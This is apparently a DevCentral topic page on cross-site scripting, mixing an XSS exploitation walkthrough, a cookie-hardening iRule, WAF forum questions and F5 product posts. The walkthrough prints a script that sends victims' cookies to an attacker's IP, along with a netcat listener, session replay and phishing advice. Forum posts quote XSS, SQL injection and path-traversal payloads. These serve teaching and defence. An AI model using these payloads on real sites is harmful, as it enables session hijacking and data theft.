xss
12 TopicsCross Site Scripting (XSS) Exploit Paths
Introduction Web application threats continue to cause serious security issues for large corporations and small businesses alike. In 2016, even the smallest, local family businesses have a Web presence, and it is important to understand the potential attack surface in any web-facing asset, in order to properly understand vulnerabilities, exploitability, and thus risk. The Open Web Application Security Project (OWASP) is a non-profit organization dedicated to ensuring the safety and security of web application software, and periodically releases a Top 10 list of common categories of web application security flaws. The current list is available at https://www.owasp.org/index.php/Top_10_2013-Top_10 (an updated list for 2016/2017 is currently in data call announcement), and is used by application developers, security professionals, software vendors and IT managers as a reference point for understanding the nature of web application security vulnerabilities. This article presents a detailed analysis of the OWASP security flaw A3: Cross-Site Scripting (XSS), including descriptions of the three broad types of XSS and possibilities for exploitation. Cross Site Scripting (XSS) Cross-Site Scripting (XSS) attacks are a type of web application injection attack in which malicious script is delivered to a client browser using the vulnerable web app as an intermediary. The general effect is that the client browser is tricked into performing actions not intended by the web application. The classic example of an XSS attack is to force the victim browser to throw an ‘XSS!’ or ‘Alert!’ popup, but actual exploitation can result in the theft of cookies or confidential data, download of malware, etc. Persistent XSS Persistent (or Stored) XSS refers to a condition where the malicious script can be stored persistently on the vulnerable system, such as in the form of a message board post. Any victim browsing the page containing the XSS script is an exploit target. This is a very serious vulnerability as a public stored XSS vulnerability could result in many thousands of cookies stolen, drive-by malware downloads, etc. As a proof-of-concept for cookie theft on a simple message board application, consider the following: Here is our freshly-installed message board application. Users can post comments, admins can access the admin panel. Let’s use the typical POC exercise to validate that the message board is vulnerable to XSS: Sure enough, it is: Just throwing a dialog box is kinda boring, so let’s do something more interesting. I’m going to inject a persistent XSS script that will steal the cookies of anyone browsing the vulnerable page: Now I start a listener on my attacking box, this can be as simple as netcat, but can be any webserver of your choosing (python simpleHTTPserver is another nice option). dsyme@kylie:~$ sudo nc -nvlp 81 And wait for someone – hopefully the site admin – to browse the page. The admin has logged in and browsed the page. Now, my listener catches the HTTP callout from my malicious script: And I have my stolen cookie PHPSESSID=lrft6d834uqtflqtqh5l56a5m4 . Now I can use an intercepting proxy or cookie manager to impersonate admin. Using Burp: Or, using Cookie Manager for Firefox: Now I’m logged into the admin page: Access to a web application CMS is pretty close to pwn. From here I can persist my access by creating additional admin accounts (noisy), or upload a shell (web/php reverse) to get shell access to the victim server. Bear in mind that using such techniques we could easily host malware on our webserver, and every victim visiting the page with stored XSS would get a drive-by download. Non-Persistent XSS Non-persistent (or reflected) XSS refers to a slightly different condition in which the malicious content (script) is immediately returned by a web application, be it through an error message, search result, or some other means that echoes some part of the request back to the client. Due to their nonpersistent nature, the malicious code is not stored on the vulnerable webserver, and hence it is generally necessary to trick a victim into opening a malicious link in order to exploit a reflected XSS vulnerability. We’ll use our good friend DVWA (Damn Vulnerable Web App) for this example. First, we’ll validate that it is indeed vulnerable to a reflected XSS attack: It is. Note that this can be POC’d by using the web form, or directly inserting code into the ‘name’ parameter in the URL. Let’s make sure we can capture a cookie using the similar manner as before. Start a netcat listener on 192.168.178.136:81 (and yes, we could use a full-featured webserver for this to harvest many cookies), and inject the following into the ‘name’ parameter: <SCRIPT>document.location='http://192.168.178.136:81/?'+document.cookie</SCRIPT> We have a cookie, PHPSESSID=ikm95nv7u7dlihhlkjirehbiu2 . Let’s see if we can use it to login from the command line without using a browser: $ curl -b "security=low;PHPSESSID=ikm95nv7u7dlihhlkjirehbiu2" --location "http://192.168.178.140/dvwa/" > login.html $ dsyme@kylie:~$ egrep Username login.html <div align="left"><em>Username:</em> admin<br /><em>Security Level:</em> low<br /><em>PHPIDS:</em> disabled</div> Indeed we can. Now, of course, we just stole our own cookie here. In a real attack we’d be wanting to steal the cookie of the actual site admin, and to do that, we’d need to trick him or her into clicking the following link: http://192.168.178.140/dvwa/vulnerabilities/xss_r/?name=victim<SCRIPT>document.location='http://192.168.178.136:81/?'+document.cookie</SCRIPT> Or, easily enough to put into an HTML message like this. And now we need to get our victim to click the link. A spear phishing attack might be a good way. And again, we start our listener and wait. Of course, instead of stealing admin’s cookies, we could host malware on a webserver somewhere, and distribute the malicious URL by phishing campaign, host on a compromised website, distribute through Adware (there are many possibilities), and wait for drive-by downloads. The malicious links are often obfuscated using a URL-shortening service. DOM-Based XSS DOM-based XSS is an XSS attack in which the malicious payload is executed as a result of modification of the Document Object Model (DOM) environment of the victim browser. A key differentiator between DOM-based and traditional XSS attacks is that in DOM-based attacks the malicious code is not sent in the HTTP response from server to client. In some cases, suspicious activity may be detected in HTTP requests, but in many cases no malicious content is ever sent to or from the webserver. Usually, a DOM-based XSS vulnerability is introduced by poor input validation on a client-side script. A very nice demo of DOM-based XSS is presented at https://xss-doc.appspot.com/demo/3. Here, the URL Fragment (the portion of the URL after #, which is never sent to the server) serve as input to a client-side script – in this instance, telling the browser which tab to display: Unfortunately, the URL fragment data is passed to the client-side script in an unsafe fashion. Viewing the source of the above webpage, line 8 shows the following function definition: And line 33: In this case we can pass a string to the URL fragment that we know will cause the function to error, e.g. “foo”, and set an error condition. Reproducing the example from the above URL with full credit to the author, it is possible to inject code into the error condition causing an alert dialog: Which could be modified in a similar fashion to steal cookies etc. And of course we could deface the site by injecting an image of our choosing from an external source: There are other possible vectors for DOM-based XSS attacks, such as: Unsanitized URL or POST body parameters that are passed to the server but do not modify the HTTP response, but are stored in the DOM to be used as input to the client-side script. An example is given at https://www.owasp.org/index.php/DOM_Based_XSS Interception of the HTTP response to include additional malicious scripts (or modify existing scripts) for the client browser to execute. This could be done with a Man-in-the-Browser attack (malicious browser extensions), malware, or response-side interception using a web proxy. Like reflected XSS, exploitation is often accomplished by fooling a user into clicking a malicious link. DOM-based XSS is typically a client-side attack. The only circumstances under which server-side web-based defences (such as mod_security, IDS/IPS or WAF) are able to prevent DOM-based XSS is if the malicious script is sent from client to server, which is not usually the case for DOM-based XSS. As many more web applications utilize client-side components (such as sending periodic AJAX calls for updates), DOM-based XSS vulnerabilities are on the increase – an estimated 10% of the Alexa top 10k domains contained DOM-based XSS vulnerabilities according to Ben Stock, Sebastian Lekies and Martin Johns (https://www.blackhat.com/docs/asia-15/materials/asia-15-Johns-Client-Side-Protection-Against-DOM-Based-XSS-Done-Right-(tm).pdf). Preventing XSS XSS vulnerabilities exist due to a lack of input validation, whether on the client or server side. Secure coding practices, regular code review, and white-box penetration testing are the best ways to prevent XSS in a web application, by tackling the problem at source. OWASP has a detailed list of rules for XSS prevention documented at https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet. There are many other resources online on the topic. However, for many (most?) businesses, it may not be possible to conduct code reviews or commit development effort to fixing vulnerabilities identified in penetration tests. In most cases, XSS can be easily prevented by the deployment of Web Application Firewalls. Typical mechanisms for XSS-prevention with a WAF are: Alerting on known XSS attack signatures Prevention of input of <script> tags to the application unless specifically allowed (rare) Prevention of input of < ,> characters in web forms Multiple URL decoding to prevent bypass attempts using encoding Enforcement of value types in HTTP parameters Blocking non-alphanumeric characters where they are not permitted Typical IPS appliances lack the HTTP intelligence to be able to provide the same level of protection as a WAF. For example, while an IPS may block the <script> tag (if it is correctly configured to intercept SSL), it may not be able to handle the URL decoding required to catch obfuscated attacks. F5 Silverline is a cloud-based WAF solution and provides native and quick protection against XSS attacks. This can be an excellent solution for deployed production applications that include XSS vulnerabilities, because modifying the application code to remove the vulnerability can be time-consuming and resource-intensive. Full details of blocked attacks (true positives) can be viewed in the Silverline portal, enabling application and network administrators to extract key data in order to profile attackers: Similarly, time-based histograms can be displayed providing details of blocked XSS campaigns over time. Here, we can see that a serious XSS attack was prevented by Silverline WAF on September 1 st : F5 Application Security Manager (ASM) can provide a similar level of protection in an on-premise capacity. It is of course highly recommended that any preventive controls be tested – which typically means running an automated vulnerability scan (good) or manual penetration test (better) against the application once the control is in place. As noted in the previous section, do not expect web-based defences such as a WAF to protect against DOM-based XSS as most attack vectors do no actually send any malicious traffic to the server.13KViews1like0CommentsStop Those XSS Cookie Bandits iRule Style
In a recent post, CodingHorror blogged about a story of one of his friends attempts at writing his own HTML sanitizer for his website. I won't bother repeating the details but it all boils down to the fact that his friend noticed users were logged into his website as him and hacking away with admin access. How did this happen? It turned out to be a Cross Site Scripting attack (XSS) that found it's way around his HTML sanitizing routines. A user posted some content that included mangled JavaScript that made an external reference including all history and cookies of the current users session to an alternate machine. CodingHorror recommended adding the HttpOnly attribute to Set-Cookie response headers to help protect these cookies from being able to make their way out to remote machines. Per his blog post: HttpOnly restricts all access to document.cookie in IE7, Firefox 3, and Opera 9.5 (unsure about Safari) HttpOnly removes cookie information from the response headers in XMLHttpObject.getAllResponseHeaders() in IE7. It should do the same thing in Firefox, but it doesn't, because there's a bug. XMLHttpObjects may only be submitted to the domain they originated from, so there is no cross-domain posting of the cookies. Whenever I hear about modifications made to backend servers, alarms start going off in my head and I get to thinking about how this can be accomplished on the network transparently. Well, if you happen to have a BIG-IP, then it's quite easy. A simple iRule can be constructed that will check all the response cookies and if they do not already have the HttpOnly attribute, then add it. I went one step further and added a check for the "Secure" attribute and added that one in as well for good measure. when HTTP_RESPONSE { foreach cookie [HTTP::cookie names] { set value [HTTP::cookie value $cookie]; if { "" != $value } { set testvalue [string tolower $value] set valuelen [string length $value] #log local0. "Cookie found: $cookie = $value"; switch -glob $testvalue { "*;secure*" - "*; secure*" { } default { set value "$value; Secure"; } } switch -glob $testvalue { "*;httponly*" - "*; httponly*" { } default { set value "$value; HttpOnly"; } } if { [string length $value] > $valuelen} { #log local0. "Replacing cookie $cookie with $value" HTTP::cookie value $cookie "${value}" } } } } If you are only concerned with the Secure attribute, then you can always use the "HTTP::cookie secure" command but as far as I can tell it won't include the HttpOnly attribute. So, if you determine that HttpOnly cookies are the way you want to go, you could manually configure these on all of your applications on your backend servers. Or... you could configure it in one place on the network. I think I prefer the second option. -Joe403Views0likes0CommentsWAF Attack Signature Level
Hi, I have a specific URL defined in the ASM Allowed URLs ("/path01/page.aspx" for our example), which has "Check attack signatures" checked. In the Parameters we have only Wildcard with Ignore Value set. We found this melicious attempt request wasn't detected: /path01/page.aspx?a=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&b=UNION+SELECT+ALL+FROM+information_schema+AND+%27+or+SLEEP%285%29+or+%27&c=..%2F..%2F..%2F..%2Fetc%2Fpasswd which decodes to this: /path01/page.aspx?a=<script>alert("XSS");</script>&b=UNION SELECT ALL FROM information_schema AND ' or SLEEP(5) or '&c=../../../../etc/passwd So I understand the melicious code is in the parameter context, so it's not checked due to the wildcard settings. But on the other hand, under the specific URL context, there are several "XSS (parameters)" signatures enabled. Doesn't that mean that under that specific URL it should check for XSS in parameters signatures? Thanks1.1KViews0likes3CommentsLightboard Lessons: OWASP Top 10 - Cross Site Scripting
The OWASP Top 10 is a list of the most common security risks on the Internet today. Cross Site Scripting (XSS)comes in at the #7spot in the latest edition of the OWASP Top 10. In this video, John discusses how Cross Site Scripting worksand outlines some mitigation steps to make sure your web application stays secure against this threat. Related Resources: Securing against the OWASP Top 10: Cross-Site Scripting692Views0likes0CommentsASM don't block XSS
hi all, why the asm don't block this : "</script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>"><script>alert(150)</script>&arguments=-N2019,-A,-N325,-N0" all the XSS signature are enabled and i see in the security logs that there is some XSS attacks that get blocked.903Views0likes4Commentsviewing full request on ASM Reporting
Hi, Is there a way to get the full request on ASM Reporting? SOL12044 says default behavior is ASM truncates the request on ASM Reporting. https://support.f5.com/kb/en-us/solutions/public/12000/000/sol12044.html Reason I asked is I am seeing traffic that matches Cross Site Scripting signature but it is not showing the violation details (eg. matching string, etc). Thanks in advance for the assistance.303Views0likes3CommentsASM Custom signature set behavior.
Hey Folks, Asking a query after a long. I found a limitation with ASM Custom Signature Set configuration, and I need your expert advise to confirm if my understanding is correct or not. We have got a requirement from a customer to block all Javascript based XSS attacks. (They have external pentesting team, who found that their application is vulnerable to XSS for every javascript events). Using the default ASM signature set, it didn't seem to working with Javascript event based XSS attack, however rest of the attacks were being blocked. To achieve customer's requirement, we designed a custom signature set, contains 39 different signatures for every events For eg. , onChange etc. and put all the signatures into a single signature set in ASM. Surprisingly, only first signature worked and rest 38 didn't. I'd take one signature from the list, and configure another signature set, and put this signature into the new signature set. And it worked. This seems that I must have to create individual signature set for individual signatures. Which I feel tedious and time consuming. Prone to error and increase administrative overhead. Could anyone please confirm if this is normal behavior? Is this a limitation of ASM? Thanks in advance, Darshan277Views0likes0CommentsThe Lock May be Broken
A couple of weeks ago, a new security advisory was published: CVE-2012-0053 - “Apache HttpOnly Cookie Disclosure”. While the severity of this vulnerability is just “medium”, there are some things that we can learn from it. As far as I see it, this vulnerability actually uses a more sophisticated approach in order to steal sensitive information. It suggests an exploit proof of concept that combines two attack methods: 1. A well-known application security vulnerability named “Cross-Site Scripting (XSS)”. 2. A newly introduced vulnerability in Apache, where sending a cookie HTTP-Header that is too long, the HttpOnly cookie value, is returned by the web server in a “400 Bad Request” response page. From the OWASP page on HttpOnly - Mitigating the Most Common XSS attack using HttpOnly “The majority of XSS attacks target theft of session cookies. A server could help mitigate this issue by setting the HTTPOnly flag on a cookie it creates, indicating the cookie should not be accessible on the client. If a browser that supports HttpOnly detects a cookie containing the HttpOnly flag, and client side script code attempts to read the cookie, the browser returns an empty string as the result. This causes the attack to fail by preventing the malicious (usually XSS) code from sending the data to an attacker's website.” So the HttpOnly cookie that is not supposed to be accessed by Java-Script on client browser can be accessed when exploiting this vulnerability. In other words, the lock may be broken, and the mechanism that is supposed to prevent an attack, in some circumstances, can be bypassed. This leads me to say that while security countermeasures are becoming more and more sophisticated over the years, security vulnerabilities and their exploits are becoming more and more elusive. Web Application Firewalls were designed from the beginning to solve such zero-day vulnerabilities presenting multi layered protection for the web application by combining signature based, HTTP protocol constraints and web application behavioral anomalies protection. From BIG-IP Application Security Manager perspective, this vulnerability can be easily mitigated by performing the following: i. Using Cross-Site Scripting signatures in order to mitigate Cross-Site Scripting vulnerabilities. ii. Applying a security policy that limits the header’s length. iii. Creating a custom error page when this violation occurs.288Views0likes0CommentsF5 Friday: Eliminating the Blind Spot in Your Data Center Security Strategy
Pop Quiz: In recent weeks, which of the following attack vectors have been successfully used to breach major corporation security? (choose all that apply) Phishing Parameter tampering SQL Injection DDoS SlowLoris Data leakage If you selected them all, give yourself a cookie because you’re absolutely right. All six of these attacks have successfully been used recently, resulting in breaches across the globe: International Monetary Fund US Government – Senate CIA Citibank Malaysian Government Sony Brazilian governmentand Petrobraslatest LulzSecvictims That’s no surprise; attacks are ongoing, constantly. They are relentless. Many of them are mass attacks with no specific target in mind, others are more subtle, planned and designed to do serious damage to the victim. Regardless, these breaches all have one thing in common: the breach was preventable. At issue is the reality that attackers today have moved up the stack and are attacking in the data center’s security blind spot: the application layer. Gone are the days of blasting the walls of the data center with packets to take out a site. Data center interconnects have expanded to the point that it’s nearly impossible to disrupt network infrastructure and cause an outage without a highly concerted and distributed effort. It does happen, but it’s more frequently the case that attackers are moving to highly targeted, layer 7 attacks that are far more successful using far fewer resources with a much smaller chance of being discovered. The security-oriented infrastructure traditionally relied upon to alert on attacks is blind; unable to detect layer 7 attacks because they don’t appear to be attacks. They look just like “normal” users. The most recent attack, against www.cia.gov, does not appear to be particularly sophisticated. LulzSec described that attack as a simple packet flood, which overwhelms a server with volume. Analysts at F5, which focuses on application security and availability, speculated that it actually was a Slowloris attack, a low-bandwidth technique that ties up server connections by sending partial requests that are never completed. Such an attack can come in under the radar because of the low volume of traffic it generates and because it targets the application layer, Layer 7 in the OSI model, rather than the network layer, Layer 3. [emphasis added] -- Ongoing storm of cyberattacks is preventable, experts say It isn’t the case that organizations don’t have a sound security strategy and matching implementation, it’s that the strategy has a blind spot at the application layer. In fact, it’s been the evolution of network and transport layer security success that’s almost certainly driven attackers to climb higher up the stack in search of new and unanticipated (and often unprotected) avenues of opportunity. ELIMINATING the BLIND SPOT Too often organizations – and specifically developers – hear the words “layer 7” anything and immediately take umbrage at the implication they are failing to address application security. In many situations it is the application that is vulnerable, but far more often it’s not the application – it’s the application platform or protocols that is the source of contention, neither of which a developer has any real control over. Attacks designed to specifically leech off resources – SlowLoris, DDoS, HTTP floods – simply cannot be noticed or prevented by the application itself. Neither are these attacks noticed or prevented by most security infrastructure components because they do not appear to be attacks. In cases where protocol (HTTP) exploitation is leveraged, it is not possible to detect such an attack unless the right information is available in the right place at the right time. The right place is a strategic point of control. The right time is when the attack begins. The right information is a combination of variables, the context carried with every request that imparts information about the client, network, and server-side status. If a component can see that a particular user is sending data at a rate much slower than their network connection should allow, that tells the component it’s probably an application layer attack that then triggers organizational policies regarding how to deal with such an attack: reject the connection, shield the application, notify an administrator. Only a component that is positioned properly in the data center, i.e. in a strategic point of control, can properly see all the variables and make such a determination. Only a component that is designed specifically to intercept, inspect and act on data across the entire network and application stack can detect and prevent such attacks from being successfully carried out. BIG-IP is uniquely positioned – topologically and technologically – to address exactly these kinds of multi-layer attacks. Whether the strategy to redress such attacks is “Inspect and Reject” or “Buffer and Wait”, the implementation using BIG-IP simply makes sense. Because of its position in the network – in front of applications, between clients and servers – BIG-IP has the visibility into both internal and external variables necessary. With its ability to intercept and inspect and then act upon the variables extracted, BIG-IP is perfectly suited to detecting and preventing attacks that normally wind up in most infrastructure’s blind spot. This trend is likely to continue, and it’s also likely that additional “blind spots” will appear as consumerization via tablets and mobile devices continues to drive new platforms and protocols into the data center. Preventing attacks from breaching security and claiming victory – whether the intent is to embarrass or to profit – is the goal of a comprehensive organizational security strategy. That requires a comprehensive, i.e. multi-layer, security architecture and implementation. One without any blind spots in which an attacker can sneak up on you and penetrate your defenses. It’s time to evaluate your security strategy and systems with an eye toward whether such blind spots exist in your data center. And if they do, it’s well past time to do something about it. More Info on Attack Prevention on DevCentral DevCentral Security Forums DDoS Attack Protection in BIG-IP Local Traffic Manager DDoS Attack Protection in BIG-IP Application Security Manager196Views0likes0CommentsF5 Friday: Expected Behavior is not Necessarily Acceptable Behavior
Sometimes vulnerabilities are simply the result of a protocol design decision, but that doesn’t make it any less a vulnerability An article discussing a new attack on social networking applications that effectively provides an opening through which personal data can be leaked was passed around the Internets recently. If you haven’t read “Abusing HTTP Status Codes to Expose Private Information” yet please do, it’s a good read and exposes, if you’ll pardon the pun, yet another “vulnerability by design” flaw that exists in many of the protocols that make the web go today. We, as an industry, spend a lot of time picking on developers for not writing secure code, for introducing vulnerabilities and subsequently ignoring them, and for basically making the web a very scary place. We rarely, however, talk about the insecurities and flaws inherent in core protocols, however, that contribute to the overall scariness of the Internets. Consider, for example, the misuse and abuse of HTTP as a means to carry out a DDoS attack. Such attacks are not viable due to some developer with a lax attitude toward security, it’s simply the result of the way in which the protocol works. Someone discovered a way to put it to work to carry out their evil plans. The same can be said of the aforementioned “vulnerability.” This isn’t the result of developers not caring about security, it’s merely a side-effect of the way in which HTTP is supposed to work. Site and application developers use HTTP status codes and the like to respond to requests in addition to the content returned. Some of those HTTP status codes aren’t even under the control of the site or application developer – 5xx errors are returned by the web or application server software automatically based on internal conditions. That someone has found a way to leverage these basic behaviors in a way that might allow personal information to be exposed should be no surprise. The more complex web applications – and the interactions that make the “web” an actual “web” of interconnected sites and data stores – become, the more innovative use of admittedly very basic application protocols must be made. That innovation can almost always be turned around and used for more malevolent purposes. What was, troubling, however, was Google’s response to this “vulnerability” in Gmail as described by the author. The author states he “reported it to Google and they described it as "expected behaviour" and ignored it.” Now Google is right – it is expected behavior but that doesn’t necessarily mean it’s acceptable behavior. PROTECTING YOURSELF from BAD EXPECTED BEHAVIOR Enabling protection against this potential exposure of personal information depends on whether you are a user or someone charged with protecting user’s information. If you didn’t read through all the comments on the article then you missed a great suggestion for users interested in protecting themselves against what is similar to a cross-site request forgery (XSRF) attack. I’ll reproduce it here, in total, to make sure nothing is lost: Justin Samuel I'm the RequestPolicy developer. Thanks for the mention. I should point out that if you're using NoScript then you're already safe as long as you haven't allowed JavaScript on this or the other sites. Of course, people do allow JavaScript in some cases but still want control over cross-site requests. In those cases, NoScript + RequestPolicy is a great combo (it's what I use) if the usability impact of having two website-breaking, whitelist-based extensions installed is worth the security and privacy gains. RequestPolicy does have some good usability improvements planned, but if you can only stand to have one of these extensions installed, then I recommend NoScript over RequestPolicy in most situations. Written, Tuesday January the 25th, 2011 So as a user, NoScript or NoScript and RequestPolicy will help keep you safe from the potential misuse of this “expected behavior” by giving you the means by which you can control cross-site requests. As someone responsible for protecting your user/customer/partner/employee information, however, you can’t necessarily force the use of NoScript or RequestPolicy or any other client-side solution. First, it doesn’t protect the data from leaving the building in the first place and second, even if it did and you could force the installation/deployment of such solutions you can’t necessarily control user behavior that may lead to turning it off or otherwise manipulating the environment. The reality is that for organizations trying to protect both themselves and their customers, they have only one thing they can control – their own environment. That means the data center. PROTECTING YOUR CLIENTS FROM BAD EXPECTED BEHAVIOR To prevent data leakage of any kind – whether through behavioral or vulnerability exploitation – you need a holistic security strategy in place. The funny thing about protocol behavior exploitation, however, is that application protocol behavior is governed by the stack and the platform, not necessarily the application itself. Now in this case it’s true that the behavior is eerily similar to a cross-site request forgery (XSRF) attack. Which means developers could and probably should be able to address by enforcing policies that restrict access to specific requests based on referrer or other identifying – contextual – information. The problem is that this means modifying applications for a potential vulnerability that may or may not be exploited. It’s unlikely to have the priority necessary to garner time and effort on the application development team’s already lengthy to-do list. Which is where a web application firewall (WAF) like BIG-IP ASM (Application Security Manager) comes into play. BIG-IP ASM can protect applications and sensitive data from attacks like XSRF right now. It doesn’t take nearly the cycles to implement an XSRF (or other web application layer security policy) using ASM as it will to address in the application itself (if that’s even possible – sometimes it’s not). Whether ASM or any WAF ends up permanently protecting data against exploitation or not is entirely up to the organization. In some cases it may be the most financially and architecturally efficient solution. In other cases it may not. In the former, hey great. In the latter, hey great – you’ve got a stop gap measure to protect data and customers and the organization until such time as a solution can be implemented, tested, and ultimately deployed. Either way, BIG-IP ASM enables organizations to quickly address expected (but still unacceptable) behavior. That means risk is nearly immediately mitigated whether or not the long term solution remains the WAF or falls to developers. Customers don’t care about the political battles or religious wars that occur regarding the role of web application firewalls in the larger data center security strategy and they really don’t want to hear about “expected behavior” as the cause of a data leak. They care that they are protected when using applications against inadvertent theft of their private, personal data. It’s the job of IT to do just that, one way or another. Facebook app pages serve up Javascript and Acai Berry spam The “True Security Company” Red Herring F5 Friday: Two Heads are Better Than One Challenging the Firewall Data Center Dogma F5 Friday: Multi-Layer Security for Multi-Layer Attacks F5 Friday: You’ll Catch More Bees with Honey(pots) Defeating Attacks Easier Than Detecting Them 2011 Hactivism Report Security is Our Job F5 Networks Hacktivism Focus Group182Views0likes0Comments